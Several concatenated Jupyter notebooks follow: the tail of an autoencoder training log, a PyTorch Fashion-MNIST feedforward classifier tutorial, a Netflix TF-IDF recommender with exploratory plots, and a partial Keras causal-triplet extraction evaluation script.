313/313 [==============================] - 2s 7ms/step - loss: 0.0311 - acc: 0.9949 - val_loss: 0.8909 - val_acc: 0.9222
Epoch 59/100
313/313 [==============================] - 2s 7ms/step - loss: 0.0304 - acc: 0.9952 - val_loss: 0.9022 - val_acc: 0.9215
Epoch 60/100
###Markdown
Remark:The validation accuracy must be above 90%. It means the low-dim features learned by the supervised autoencoder are very effective.
###Code
# evaluate your model on the never-seen-before test data
# write your code here:
loss = classifier.evaluate(f_te, y_test_vec)
print('Accuracy:', loss[1])
###Output
313/313 [==============================] - 1s 4ms/step - loss: 1.1095 - acc: 0.9324
Accuracy: 0.9323999881744385
|
jovian/fashion-feedforward-minimal/notebook_source__.ipynb | ###Markdown
Classifying images from Fashion MNIST using feedforward neural networksDataset source: https://github.com/zalandoresearch/fashion-mnistDetailed tutorial: https://jovian.ml/aakashns/04-feedforward-nn
###Code
# Uncomment and run the commands below if imports fail
# !conda install numpy pandas pytorch torchvision cpuonly -c pytorch -y
# !pip install matplotlib --upgrade --quiet
import torch
import torchvision
import numpy as np
import matplotlib.pyplot as plt
import torch.nn as nn
import torch.nn.functional as F
from torchvision.datasets import FashionMNIST
from torchvision.transforms import ToTensor
from torchvision.utils import make_grid
from torch.utils.data.dataloader import DataLoader
from torch.utils.data import random_split
%matplotlib inline
project_name='fashion-feedforward-minimal'
###Output
_____no_output_____
###Markdown
Preparing the Data
###Code
dataset = FashionMNIST(root='data/', download=True, transform=ToTensor())
test_dataset = FashionMNIST(root='data/', train=False, transform=ToTensor())
val_size = 10000
train_size = len(dataset) - val_size
train_ds, val_ds = random_split(dataset, [train_size, val_size])
len(train_ds), len(val_ds)
batch_size=128
train_loader = DataLoader(train_ds, batch_size, shuffle=True, num_workers=4, pin_memory=True)
val_loader = DataLoader(val_ds, batch_size*2, num_workers=4, pin_memory=True)
test_loader = DataLoader(test_dataset, batch_size*2, num_workers=4, pin_memory=True)
for images, _ in train_loader:
print('images.shape:', images.shape)
plt.figure(figsize=(16,8))
plt.axis('off')
plt.imshow(make_grid(images, nrow=16).permute((1, 2, 0)))
break
###Output
images.shape: torch.Size([128, 1, 28, 28])
###Markdown
Model
###Code
def accuracy(outputs, labels):
_, preds = torch.max(outputs, dim=1)
return torch.tensor(torch.sum(preds == labels).item() / len(preds))
class MnistModel(nn.Module):
"""Feedfoward neural network with 1 hidden layer"""
def __init__(self, in_size, out_size):
super().__init__()
# hidden layer
self.linear1 = nn.Linear(in_size, 16)
# hidden layer 2
self.linear2 = nn.Linear(16, 32)
# output layer
self.linear3 = nn.Linear(32, out_size)
def forward(self, xb):
# Flatten the image tensors
out = xb.view(xb.size(0), -1)
# Get intermediate outputs using hidden layer 1
out = self.linear1(out)
# Apply activation function
out = F.relu(out)
# Get intermediate outputs using hidden layer 2
out = self.linear2(out)
# Apply activation function
out = F.relu(out)
# Get predictions using output layer
out = self.linear3(out)
return out
def training_step(self, batch):
images, labels = batch
out = self(images) # Generate predictions
loss = F.cross_entropy(out, labels) # Calculate loss
return loss
def validation_step(self, batch):
images, labels = batch
out = self(images) # Generate predictions
loss = F.cross_entropy(out, labels) # Calculate loss
acc = accuracy(out, labels) # Calculate accuracy
return {'val_loss': loss, 'val_acc': acc}
def validation_epoch_end(self, outputs):
batch_losses = [x['val_loss'] for x in outputs]
epoch_loss = torch.stack(batch_losses).mean() # Combine losses
batch_accs = [x['val_acc'] for x in outputs]
epoch_acc = torch.stack(batch_accs).mean() # Combine accuracies
return {'val_loss': epoch_loss.item(), 'val_acc': epoch_acc.item()}
def epoch_end(self, epoch, result):
print("Epoch [{}], val_loss: {:.4f}, val_acc: {:.4f}".format(epoch, result['val_loss'], result['val_acc']))
###Output
_____no_output_____
###Markdown
Using a GPU
###Code
torch.cuda.is_available()
def get_default_device():
"""Pick GPU if available, else CPU"""
if torch.cuda.is_available():
return torch.device('cuda')
else:
return torch.device('cpu')
device = get_default_device()
device
def to_device(data, device):
"""Move tensor(s) to chosen device"""
if isinstance(data, (list,tuple)):
return [to_device(x, device) for x in data]
return data.to(device, non_blocking=True)
class DeviceDataLoader():
"""Wrap a dataloader to move data to a device"""
def __init__(self, dl, device):
self.dl = dl
self.device = device
def __iter__(self):
"""Yield a batch of data after moving it to device"""
for b in self.dl:
yield to_device(b, self.device)
def __len__(self):
"""Number of batches"""
return len(self.dl)
train_loader = DeviceDataLoader(train_loader, device)
val_loader = DeviceDataLoader(val_loader, device)
test_loader = DeviceDataLoader(test_loader, device)
###Output
_____no_output_____
###Markdown
Training the model
###Code
def evaluate(model, val_loader):
outputs = [model.validation_step(batch) for batch in val_loader]
return model.validation_epoch_end(outputs)
def fit(epochs, lr, model, train_loader, val_loader, opt_func=torch.optim.SGD):
history = []
optimizer = opt_func(model.parameters(), lr)
for epoch in range(epochs):
# Training Phase
for batch in train_loader:
loss = model.training_step(batch)
loss.backward()
optimizer.step()
optimizer.zero_grad()
# Validation phase
result = evaluate(model, val_loader)
model.epoch_end(epoch, result)
history.append(result)
return history
input_size = 784
num_classes = 10
model = MnistModel(input_size, out_size=num_classes)
to_device(model, device)
history = [evaluate(model, val_loader)]
history
history += fit(5, 0.5, model, train_loader, val_loader)
history += fit(5, 0.1, model, train_loader, val_loader)
losses = [x['val_loss'] for x in history]
plt.plot(losses, '-x')
plt.xlabel('epoch')
plt.ylabel('loss')
plt.title('Loss vs. No. of epochs');
accuracies = [x['val_acc'] for x in history]
plt.plot(accuracies, '-x')
plt.xlabel('epoch')
plt.ylabel('accuracy')
plt.title('Accuracy vs. No. of epochs');
###Output
_____no_output_____
###Markdown
Prediction on Samples
###Code
def predict_image(img, model):
xb = to_device(img.unsqueeze(0), device)
yb = model(xb)
_, preds = torch.max(yb, dim=1)
return preds[0].item()
img, label = test_dataset[0]
plt.imshow(img[0], cmap='gray')
print('Label:', dataset.classes[label], ', Predicted:', dataset.classes[predict_image(img, model)])
evaluate(model, test_loader)
###Output
_____no_output_____
###Markdown
Save and upload
###Code
saved_weights_fname='fashion-feedforward.pth'
torch.save(model.state_dict(), saved_weights_fname)
!pip install jovian --upgrade --quiet
import jovian
jovian.commit(project=project_name, environment=None, outputs=[saved_weights_fname])
###Output
_____no_output_____ |
netflix-recommender-and-eda.ipynb | ###Markdown
**Welcome to our first Kernel** Please Vote If you like our Kernel and share your Feedback ** Netflix Recommender, Netflix Exploratory Data Analysis **  Netflix, Inc. is an American over-the-top content platform and production company headquartered in Los Gatos, California. Netflix was founded in 1997 by Reed Hastings and Marc Randolph in Scotts Valley, California. **The company's primary business is a subscription-based streaming service offering online streaming from a library of films and television series, including those produced in-house.**
###Code
# This Python 3 environment comes with many helpful analytics libraries installed
# It is defined by the kaggle/python Docker image: https://github.com/kaggle/docker-python
# For example, here's several helpful packages to load
import numpy as np # linear algebra
import pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)
# Input data files are available in the read-only "../input/" directory
# For example, running this (by clicking run or pressing Shift+Enter) will list all files under the input directory
import os
for dirname, _, filenames in os.walk('/kaggle/input'):
for filename in filenames:
print(os.path.join(dirname, filename))
# You can write up to 20GB to the current directory (/kaggle/working/) that gets preserved as output when you create a version using "Save & Run All"
# You can also write temporary files to /kaggle/temp/, but they won't be saved outside of the current session
import pandas as pd #pandas to load datasets
import numpy as np #numpy for linear algebra
import matplotlib.pyplot as plt #matplotlib for making plots
import seaborn as sns #seaborn for making plots
###Output
_____no_output_____
###Markdown
** NETFLIX RECOMMENDER SYSTEM ** **Recommender systems try to automate aspects of a completely different information discovery model where people try to find other people with similar tastes and then ask them to suggest new things.**
###Code
netflix_dataset = pd.read_csv("../input/netflix-shows/netflix_titles.csv")
netflix_dataset.head()
netflix_dataset.count()
###Output
_____no_output_____
###Markdown
**Content-Based Recommendation System** Content-Based Filtering **A content-based recommender works with data that the user provides, either explicitly (rating) or implicitly (clicking on a link). Based on that data, a user profile is generated, which is then used to make suggestions to the user.** **Filling NaN values with empty String ' '**
###Code
fill_netflix_dataset = netflix_dataset.fillna(' ')
fill_netflix_dataset.head()
###Output
_____no_output_____
###Markdown
**Term Frequency(TF) and Inverse Document Frequency(IDF)** **Term Frequency**, which measures how frequently a term occurs in a document. Since every document is different in length, it is possible that a term would appear much more times in long documents than shorter ones. Thus, the term frequency is often divided by the document length (aka. the total number of terms in the document) as a way of normalization:**TF(t) = (Number of times term t appears in a document) / (Total number of terms in the document)****Inverse Document Frequency**, which measures how important a term is. While computing TF, all terms are considered equally important. However, it is known that certain terms, such as "is", "of", and "that", may appear a lot of times but have little importance. Thus we need to weigh down the frequent terms while scaling up the rare ones, by computing the following:**IDF(t) = log_e(Total number of documents / Number of documents with term t in it)****TF-IDF** is used mainly because, Suppose we search for "the fundamental of DataScience" on Google. It is certain that "the" will occur more frequently than "DataScience" but the relative importance of "DataScience" is higher than "the" search query point of view.
###Code
from sklearn.feature_extraction.text import TfidfVectorizer
#Removing stop words
tf_idf = TfidfVectorizer(stop_words='english')
#Constructing TF-IDF matrix by transforming and fitting the data
tf_idf_matrix = tf_idf.fit_transform(fill_netflix_dataset['description'])
# shape of tf_idf_matrix
tf_idf_matrix.shape
###Output
_____no_output_____
###Markdown
16151 words describing 6234 movies in the Netflix dataset **Cosine Similarity**Cosine Similarity is used to calculate the numeric value that denotes the similarity between the two movies.Now, we have used the TF-IDF Vectorizer, calculating the Dot product will directly give us the Cosine Similarity Score. Therefore, we will use **sklearn's linear_kernel** instead of cosine similarity since it calculate it much faster.
###Code
from sklearn.metrics.pairwise import linear_kernel
# calculating the Cosine Similarity Score
cosine_sim_score = linear_kernel(tf_idf_matrix, tf_idf_matrix)
cosine_sim_score[0]
###Output
_____no_output_____
###Markdown
Now, we have a cosine similarity score matrix for all the movies in our Dataset.
###Code
netflix_index = netflix_dataset.index
titles = netflix_dataset['title']
indices = pd.Series(netflix_index, index = titles).drop_duplicates()
def get_recommendations(title, cosine_sim = cosine_sim_score):
idx = indices[title]
# Get the pairwise similarity scores of all movies with that movies
sim_scores = list(enumerate(cosine_sim_score[idx]))
# Sort the movies based on the similarity scores
sim_scores = sorted(sim_scores, key = lambda x: x[1], reverse = True)
# Get the scores of the 10 most similar movies
sim_scores = sim_scores[1:11]
# Get the Movie indices
movie_indices = [i[0] for i in sim_scores]
# Return the top 10 Similar movies
return netflix_dataset['title'].iloc[movie_indices]
get_recommendations('Mortel')
get_recommendations('PK')
get_recommendations('Friends')
###Output
_____no_output_____
###Markdown
It is seen that the model performs well, but it is not accurate recommendations. This is not of much use to most people as we don't take into considerations very important features such as cast, title, director, and l, which determine the rating and the popularity of a movie.Therefore, we going to use much more suggestive features than Tagline or titles.In the next subblocks, we will build a more sophisticated Recommender System that takes title, description, listed_in, cast, and director into consideration.
###Code
fill_netflix_dataset.head(2)
def clean_data(x):
return str.lower(x.replace(' ', ''))
###Output
_____no_output_____
###Markdown
Identifying features on which the model is to be filtered
###Code
features = ['title', 'director', 'cast', 'listed_in', 'description']
fill_netflix_dataset = fill_netflix_dataset[features]
for feature in features:
fill_netflix_dataset[feature] = fill_netflix_dataset[feature].apply(clean_data)
fill_netflix_dataset.head(2)
def create_soup(x):
return x['title'] + ' ' + x['director'] + ' ' + x['cast'] + ' ' + x['listed_in'] +' ' + x['description']
fill_netflix_dataset['soup'] = fill_netflix_dataset.apply(create_soup, axis = 1)
###Output
_____no_output_____
###Markdown
Now, we are going to create our updated version of the Recommender function as same as the last one
###Code
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.metrics.pairwise import cosine_similarity
count = CountVectorizer(stop_words='english')
count_matrix = count.fit_transform(fill_netflix_dataset['soup'])
cosine_sim_score2 = cosine_similarity(count_matrix, count_matrix)
fill_netflix_dataset = fill_netflix_dataset.reset_index()
indices = pd.Series(fill_netflix_dataset.index, index = fill_netflix_dataset['title'])
def updated_recommendations(title, cosine_sim = cosine_sim_score2):
title = title.replace(' ', '').lower()
idx = indices[title]
# Get the pairwise similarity scores of all movies with that movies
sim_scores = list(enumerate(cosine_sim[idx]))
# Sort the movies based on the similarity scores
sim_scores = sorted(sim_scores, key = lambda x: x[1], reverse = True)
# Get the scores of the 10 most similar movies
sim_scores = sim_scores[1:11]
# Get the Movie indices
movie_indices = [i[0] for i in sim_scores]
# Return the top 10 Similar movies
return netflix_dataset['title'].iloc[movie_indices]
updated_recommendations('PK')
updated_recommendations('The Hook Up Plan')
updated_recommendations('Kiss me first')
updated_recommendations('Friends')
###Output
_____no_output_____
###Markdown
** Analyzing Datasets through Various PLOTS for Various Information ** **Which content is more Available on NETFLIX ?** MOVIES or TV-SHOWS
###Code
# creating Countplot from Seaborn to show max available content in NETFLIX
sns.set_style('dark')
ax = plt.subplots(figsize = (6, 6))
plt.title('Countplot for Netflix Movies and TV-Shows', fontweight='bold')
ax = sns.countplot(x = 'type', data=netflix_dataset, palette='Set1')
###Output
_____no_output_____
###Markdown
Hence, This plot shows NETFLIX has more **MOVIES** content instead of TV-SHOWS. **Which month is a better option to release new Content in 2020?** This question is mainly based on distributors focused and their promotion strategy but at some point, this might be also depending on the no of new content added/ release in a month. If there is less content added in a month then more audiences going to watch that content and this increases the chances to succeed that content.**Hence, adding new content in a month or less no new content added/ release will help the content to be more successful.**
###Code
#creating heatmap to analyse least releasing month content
#fetching value of month and year from dataset to plot heatmap
#month is available in 'dateadded' coulumn in dataset (format 'month date, year')
#For fetching month we doing splitting in 'dateadded' column through whole dataset so we take dateadded coloum out from dataset
net_date = netflix_dataset[['date_added']].dropna()
net_date['Year'] = net_date.date_added.apply(lambda y : y.split(' ')[-1])
net_date['Month'] = net_date.date_added.apply(lambda y : y.split(' ')[0])
month_order = ['January', 'February', 'March', 'April', 'May', 'June', 'July', 'August', 'September', 'October', 'November', 'December']
df = net_date.groupby('Year')['Month'].value_counts().unstack().fillna(0)[month_order].T
ax = plt.subplots(figsize = (15, 6), dpi=100)
ax = sns.heatmap(df, cmap="YlGnBu", linewidths=.1)
###Output
_____no_output_____
###Markdown
August and September may be the best time to launch any new content in 2020 with respect to 2019. **In which Year Maximum Movies and TV-Shows are released ?**
###Code
ax = plt.subplots(figsize = (10, 8))
sns.set_style('dark')
plt.title('Netflix Movie and TV-Shows Releasing', fontweight='bold', fontsize=20)
ax = sns.countplot(y = 'release_year', data = netflix_dataset, order = netflix_dataset['release_year'].value_counts().index[0:15], palette='Set2')
###Output
_____no_output_____
###Markdown
This visualization shows that 2018 is the maximum releasing year for Netflix. **Dividing Netflix Dataset into two parts Movies and TV-Shows**
###Code
netflix_movies = netflix_dataset[netflix_dataset['type'] == 'Movie']
netflix_movies.head()
netflix_tvshows = netflix_dataset[netflix_dataset['type'] == 'TV Show']
netflix_tvshows.head()
###Output
_____no_output_____
###Markdown
**Movies and TV-Shows rating Analysis**
###Code
ax = plt.subplots(figsize = (10, 8))
sns.set_style('dark')
plt.title('Netflix Movie Rating', fontweight='bold', fontsize=20)
ax = sns.countplot(x = 'rating', data = netflix_movies, palette = 'Set2', order = netflix_movies['rating'].value_counts().index[0:15])
ax = plt.subplots(figsize = (10, 8))
sns.set_style('dark')
plt.title('Netflix TV-Shows Rating', fontweight = 'bold', fontsize=20)
ax = sns.countplot(x = 'rating', data = netflix_tvshows, palette='Set2', order = netflix_tvshows['rating'].value_counts().index[0:15])
###Output
_____no_output_____
###Markdown
Largest Rating in Movies and TV-Shows is of 'TV-MA', according to the TV Parental Guidelines website, means “This program is specifically designed to be viewed by adults and therefore may be unsuitable for children under 17. **Movies and TV-Shows content creating Countries**
###Code
# More movies content creating countries
countries = {}
netflix_movies['country'] = netflix_movies['country'].fillna('Unknown')
list_countries = list(netflix_movies['country'])
for i in list_countries:
i = list(i.split(','))
if len(i) is 1:
if i in list(countries.keys()):
countries[i] += 1
else:
countries[i[0]] = 1
else:
for j in i:
if j in list(countries.keys()):
countries[j] += 1
else:
countries[j] = 1
final_countries = {}
for country, no in countries.items():
country = country.replace(' ','')
if country in list(final_countries.keys()):
final_countries[country] += no
else:
final_countries[country] = no
final_countries = {k : v for k, v in sorted(final_countries.items(), key = lambda item : item[1], reverse = True)}
plt.figure(figsize = (15, 15))
plt.title('Movie Content Creating Countries', fontweight = 'bold', fontsize=15)
y_ver = list(final_countries.keys())
x_hor = list(final_countries.values())
sns.barplot( y = y_ver[0:40], x = x_hor[0:40])
plt.ylabel('Arrival delays (in minutes)')
###Output
_____no_output_____
###Markdown
United State is the most Movie conent creating country.
###Code
# More TV-Shows content creating countries
countries = {}
netflix_tvshows['country'] = netflix_tvshows['country'].fillna('Unknown')
list_countries = list(netflix_tvshows['country'])
for i in list_countries:
i = list(i.split(','))
if len(i) is 1:
if i in list(countries.keys()):
countries[i] += 1
else:
countries[i[0]] = 1
else:
for j in i:
if j in list(countries.keys()):
countries[j] += 1
else:
countries[j] = 1
final_countries = {}
for country, no in countries.items():
country = country.replace(' ','')
if country in list(final_countries.keys()):
final_countries[country] += no
else:
final_countries[country] = no
final_countries = {k : v for k, v in sorted(final_countries.items(), key = lambda item : item[1], reverse = True)}
plt.figure(figsize = (15, 15))
plt.title('TV-Shows Content Creating Countries', fontweight = 'bold', fontsize=15)
y_ver = list(final_countries.keys())
x_hor = list(final_countries.values())
sns.barplot( y = y_ver[0:40], x = x_hor[0:40])
plt.ylabel('Arrival delays (in minutes)')
###Output
_____no_output_____
###Markdown
United State is the most TV-Shows conent creating country. **Genres WordClouds for Movies and TV-Shows**
###Code
from collections import Counter
from wordcloud import WordCloud, STOPWORDS, ImageColorGenerator
genres = list(netflix_movies['listed_in'])
gen = []
for i in genres:
i = list(i.split(','))
for j in i:
gen.append(j.replace(' ',''))
g = Counter(gen)
text = list(set(gen))
plt.rcParams['figure.figsize'] = (13, 13)
wordcloud = WordCloud(max_font_size = 50, max_words = 100, background_color = 'white').generate(str(text))
plt.title('Movies Genres WordCloud', fontweight = 'bold', fontsize=15)
plt.imshow(wordcloud, interpolation = 'bilinear')
plt.axis('off')
plt.show()
genres = list(netflix_tvshows['listed_in'])
gen = []
for i in genres:
i = list(i.split(','))
for j in i:
gen.append(j.replace(' ',''))
g=Counter(gen)
text = list(set(gen))
wordcloud = WordCloud(max_font_size=50, max_words=100, background_color="white").generate(str(text))
plt.rcParams['figure.figsize'] = (13, 13)
plt.title('TV-Shows Genres WordCloud', fontweight = 'bold', fontsize=15)
plt.imshow(wordcloud, interpolation="bilinear")
plt.axis("off")
plt.show()
###Output
_____no_output_____ |
models/evaluate.ipynb | ###Markdown
Plot Result
###Code
import os
import numpy as np
import matplotlib.pyplot as plt
from IPython.display import Image
import pickle
%matplotlib inline
%config InlineBackend.figure_format = 'retina'
def cv_result(fileName, e):
import os
from tqdm import tqdm
filePath, r = [], [0]*e
for i in os.walk(fileName):
if i != [] and i[-1] != []:
filePath.extend(i[-1])
filePath = [fileName+fp for fp in filePath]
for fp in filePath:
cv = pickle.load(open(fp, 'rb'))
for i in range(len(cv[-1])):
r[i] += cv[-1][i]
return [(i[0], i[-1]/len(filePath)) for i in enumerate(r, 1)]
def plot_ctl(file_path, num_epochs=200, show=False, save_path=None):
"""
Plot f1-score for causal triplet labeling
"""
f1 = [i[-1] for i in cv_result(file_path, num_epochs)]
max_f1, epoch = max(f1), list(f1).index(max(f1))+1
epochs = list(range(1, num_epochs+1))
plt.figure(figsize=(10, 8))
plt.plot(epochs, f1, label="F1-Score", color="green", linewidth=1)
plt.xlabel("Epochs")
plt.ylabel("Causal Triplet Labeling")
plt.xticks([i for i in range(1, len(f1), 14)])
plt.grid(True)
plt.legend()
plt.annotate('max: %.3f epoch: %3d' % (max_f1, epoch), xy=(epoch, max_f1-0.01),
xytext=(epoch-40, max_f1-0.05), arrowprops=dict(facecolor='black'))
if save_path != None:
plt.savefig(save_path, dpi=666)
def plot_loss(file_path, num_epochs=200, show=False, save_path=None):
"""
Plot Loss
"""
log = np.load(open(file_path, 'rb'))
plt.figure(figsize=(10, 8))
loss, val_loss = sum([i['loss'] for i in log], []), sum(
[i['val_loss'] for i in log], [])
min_loss, min_val_loss = min(loss), min(val_loss)
loss_epoch, val_loss_epoch = list(loss).index(
min(loss))+1, list(val_loss).index(min(val_loss))+1
epochs = list(range(1, num_epochs+1))
plt.plot(epochs, val_loss, label="val_loss", color="red", linewidth=1)
plt.plot(epochs, loss, label="train_loss", color="green", linewidth=1)
plt.xlabel("Epochs")
plt.ylabel("Loss")
plt.xticks([i for i in range(1, len(loss), 16)])
plt.grid(True)
plt.annotate('min: %.3f epoch: %3d' % (min_loss, loss_epoch), xy=(loss_epoch, min_loss+0.1),
xytext=(loss_epoch-40, min_loss+2), arrowprops=dict(facecolor='black', shrink=0.05))
plt.annotate('min: %.3f epoch: %3d' % (min_val_loss, val_loss_epoch), xy=(val_loss_epoch, min_val_loss+0.1),
xytext=(val_loss_epoch-40, min_val_loss+2), arrowprops=dict(facecolor='black', shrink=0.05))
plt.legend()
if save_path != None:
plt.savefig(save_path, dpi=666)
# plot_ctl('yout path to cv log')
###Output
_____no_output_____
###Markdown
Evaluate Build Model
###Code
# -*- coding: utf-8 -*-
'''
Author: Zhaoning Li
'''
import keras
import numpy as np
import os
import random as rn
import tensorflow as tf
from keras import backend as K
import pickle
from keras.utils import to_categorical
import h5py
from keras.layers import *
import math
from MHSA import MultiHeadSelfAttention
from ChainCRF import ChainCRF
from keras.models import Model
from keras import optimizers
from keras.callbacks import*
from tag2triplet import*
from sklearn.model_selection import train_test_split
import matplotlib.pyplot as plt
import argparse
MAX_WLEN = 58
MAX_CLEN = 23
VOCAB_SIZE = 15539
CHAR_SIZE = 69
EXTVEC_DIM = 300
FLAIR_DIM = 4096
CHAR_DIM = 30
NUM_CHAR_CNN_FILTER = 30
CHAR_CNN_KERNEL_SIZE = 3
CHAR_LSTM_SIZE = 25
NUM_ID_CNN_FILTER = 300
ID_CNN_KERNEL_SIZE = 3
DILATION_RATE = (1, 2, 4, 1)
NUM_CLASS = 7
class MaskConv1D(Conv1D):
def __init__(self, **kwargs):
super(MaskConv1D, self).__init__(**kwargs)
self.supports_masking = True
def compute_mask(self, inputs, mask=None):
return mask
def call(self, inputs, mask=None):
if mask is not None:
mask = K.cast(mask, K.floatx())
inputs *= K.expand_dims(mask, axis=-1)
return super(MaskConv1D, self).call(inputs)
class DataGenerator(keras.utils.Sequence):
def __init__(self, list_IDs, x, x_flair, x_char, y, batch_size, classifier, pred=False):
self.list_IDs = list_IDs
self.x = x
self.x_flair = x_flair
self.x_char = x_char
self.y = y
self.batch_size = batch_size
self.classifier = classifier
self.pred = pred
def __len__(self):
return int(np.ceil(len(self.list_IDs) / self.batch_size))
def __getitem__(self, index):
list_IDs_temp = self.list_IDs[index *
self.batch_size:(index+1)*self.batch_size]
return self.__data_generation(list_IDs_temp)
def __data_generation(self, list_IDs_temp):
x = []
if self.pred:
maxlen = MAX_WLEN
else:
maxlen = max([len(np.where(self.x[ID] != 0)[0])
for ID in list_IDs_temp])
x.append(np.zeros((self.batch_size, maxlen)))
for i, ID in enumerate(list_IDs_temp):
x[0][i] = self.x[ID][:maxlen]
if self.x_flair != None:
x_flair = np.zeros((self.batch_size, maxlen, FLAIR_DIM))
for i, ID in enumerate(list_IDs_temp):
x_flair[i] = self.x_flair[ID][:maxlen]
x.append(x_flair)
if self.x_char != None:
if self.pred:
maxlen_c = MAX_CLEN
else:
maxlen_c = max([len(np.where(self.x[ID][_] != 0)[0]) for _ in range(maxlen) for ID in list_IDs_temp])
x_char = np.zeros((self.batch_size, maxlen, maxlen_c))
for i, ID in enumerate(list_IDs_temp):
x_char[i] = self.x_char[ID][:maxlen][:, :maxlen_c]
x.append(x_char)
if self.pred:
return x
y = np.zeros((self.batch_size, maxlen, 1))
for i, ID in enumerate(list_IDs_temp):
y[i] = self.y[ID][:maxlen]
return x, y
class Data:
def __init__(self, args):
self.word2index, self.index2word = pickle.load(
open(args.file_path+'index/index_w.pkl', 'rb'))
self.embedding = np.load(
open(args.file_path+'embedding/extvec_embedding.npy', 'rb'))
with h5py.File(args.file_path+'test/test.h5', 'r') as fh:
self.xTest = fh['xTest'][:]
self.yTest = fh['yTest'][:]
self.test_flair, self.test_char = None, None
if args.use_flair:
h5f = h5py.File(args.file_path+'embedding/flair.h5', 'r')
self.test_flair = h5f['xTest_flair']
if args.char_emb != None:
h5f_te = h5py.File(args.file_path+'test/test.h5', 'r')
self.test_char = h5f_te['xTest_c']
y_true = self.yTest.reshape(self.yTest.shape[0], MAX_WLEN)
self.y_true_idx = [final_result(y_true[i], [
self.index2word[w] for w in self.xTest[i] if w != 0]) for i in range(len(y_true))]
self.ap = sum([len(i) for i in self.y_true_idx if i != 0])
class Evaluate(Callback):
def __init__(self,
args,
data,
x,
x_g,
y_true_idx,
ap,
save_path=None):
self.pre = []
self.rec = []
self.f1 = []
self.best_f1 = 0.
self.x = x
self.x_g = x_g
self.y_true_idx = y_true_idx
self.ap = ap
self.save_path = save_path
def on_epoch_end(self, epoch, logs=None):
if args.objective == 'cv':
y_pred = np.argmax(self.model.predict_generator(self.x_g), axis=-1)[:len(self.x)]
y_pred_idx = [final_result(
y_pred[i], [data.index2word[w] for w in self.x[i] if w != 0]) for i in range(len(y_pred))]
pp = sum([len(i) for i in y_pred_idx if i != 0])
tp = 0
for i in range(len(self.y_true_idx)):
if self.y_true_idx[i] != 0 and y_pred_idx[i] != 0:
for m in self.y_true_idx[i]:
y_true_cause = [data.index2word[self.x[i][idx]]
for idx in m[0]]
y_true_effect = [data.index2word[self.x[i][idx]]
for idx in m[-1]]
for n in y_pred_idx[i]:
y_pred_cause = [data.index2word[self.x[i][idx]]
for idx in n[0] if self.x[i][idx] != 0]
y_pred_effect = [data.index2word[self.x[i][idx]]
for idx in n[-1] if self.x[i][idx] != 0]
if y_true_cause == y_pred_cause and y_true_effect == y_pred_effect:
tp += 1
pre = tp / float(pp) if pp != 0 else 0
rec = tp / float(self.ap) if self.ap != 0 else 0
f1 = 2 * pre * rec / float(pre + rec) if (pre + rec) != 0 else 0
self.pre.append(pre)
self.rec.append(rec)
self.f1.append(f1)
if f1 > self.best_f1:
self.best_f1 = f1
print(' - val_precision: %.4f - val_recall: %.4f - val_f1_score: %.4f - best_f1_score: %.4f' %
(pre, rec, f1, self.best_f1))
if epoch + 1 == args.num_epochs:
isExists = os.path.exists(self.save_path+'/cv/'+str(args.seed))
if not isExists:
os.makedirs(self.save_path+'/cv/'+str(args.seed))
with open(self.save_path+'/cv/'+str(args.seed)+'/'+str(args.k_fold)+'.pkl', 'wb') as fp:
pickle.dump((self.pre, self.rec, self.f1), fp, -1)
if args.objective == 'test':
if epoch + 1 > 0:
isExists = os.path.exists(self.save_path+'/test')
if not isExists:
os.makedirs(self.save_path+'/test')
self.model.save(filepath=self.save_path+'/test/'+str(args.seed) + '_{' +
str(epoch + 1) + '}' + '.hdf5')
class CausalityExtractor:
def __init__(self, args):
self.reproducibility()
self.kernel_initializer = keras.initializers.glorot_uniform(
seed=args.seed)
self.recurrent_initializer = keras.initializers.Orthogonal(
seed=args.seed)
self.lr = args.learning_rate
self.save_path = 'logs/FLAIR-'+str(args.use_flair)+'_CHAR-'+str(args.char_emb) + \
'_'+args.backbone.upper()+'_1-512' + \
'_MHSA-'+str(args.use_att)+'_' + args.classifier.upper()
def reproducibility(self):
"""
Ensure that the model can obtain reproducible results
"""
os.environ['PYTHONHASHSEED'] = str(args.seed)
os.environ['CUDA_VISIBLE_DEVICES'] = str(args.cuda_devices)
np.random.seed(args.seed)
rn.seed(args.seed)
session_conf = tf.ConfigProto(
device_count={'CPU': args.cpu_core},
intra_op_parallelism_threads=args.cpu_core,
inter_op_parallelism_threads=args.cpu_core,
gpu_options=tf.GPUOptions(allow_growth=True,
#per_process_gpu_memory_fraction=0.7
),
allow_soft_placement=True)
tf.set_random_seed(args.seed)
sess = tf.Session(graph=tf.get_default_graph(), config=session_conf)
K.set_session(sess)
def conv_block(self, x, dilation_rate=1, use_dropout=True, name='1'):
'''
Utility function to apply conv.
'''
x = MaskConv1D(filters=NUM_ID_CNN_FILTER,
kernel_size=ID_CNN_KERNEL_SIZE,
padding='same',
dilation_rate=dilation_rate,
kernel_initializer=self.kernel_initializer,
name='CONV-'+name)(x)
x = Activation('relu', name='RELU-'+name)(x)
if use_dropout:
x = Dropout(args.dropout_rate, seed=args.seed,
name='DROPOUT-'+name)(x)
return x
def slm(self, data):
"""
Returns Sequence Labeling Model.
"""
seq = Input(shape=(None,), name='INPUT')
emb = Embedding(VOCAB_SIZE,
EXTVEC_DIM,
weights=[data.embedding],
mask_zero=True,
trainable=False, name='WE')(seq)
input_node = [seq]
if args.use_flair:
flair = Input(shape=(None, FLAIR_DIM), name='FLAIR')
emb = concatenate([emb, flair], axis=-1, name='EMB_FLAIR')
input_node.append(flair)
if args.char_emb != None:
char_embedding = []
for _ in range(CHAR_SIZE):
scale = math.sqrt(3.0 / CHAR_DIM)
char_embedding.append(
np.random.uniform(-scale, scale, CHAR_DIM))
char_embedding[0] = np.zeros(CHAR_DIM)
char_embedding = np.asarray(char_embedding)
char_seq = Input(shape=(None, None), name='CHAR_INPUT')
char_emb = TimeDistributed(
Embedding(CHAR_SIZE,
CHAR_DIM,
weights=[char_embedding],
mask_zero=True,
trainable=True), name='CHAR_EMB')(char_seq)
if args.char_emb == 'lstm':
char_emb = TimeDistributed(Bidirectional(LSTM(CHAR_LSTM_SIZE,
kernel_initializer=self.kernel_initializer,
recurrent_initializer=self.recurrent_initializer,
implementation=2,
return_sequences=False)), name="CHAR_BiLSTM")(char_emb)
if args.char_emb == 'cnn':
char_emb = TimeDistributed(MaskConv1D(filters=NUM_CHAR_CNN_FILTER,
kernel_size=CHAR_CNN_KERNEL_SIZE,
padding='same',
kernel_initializer=self.kernel_initializer), name="CHAR_CNN")(char_emb)
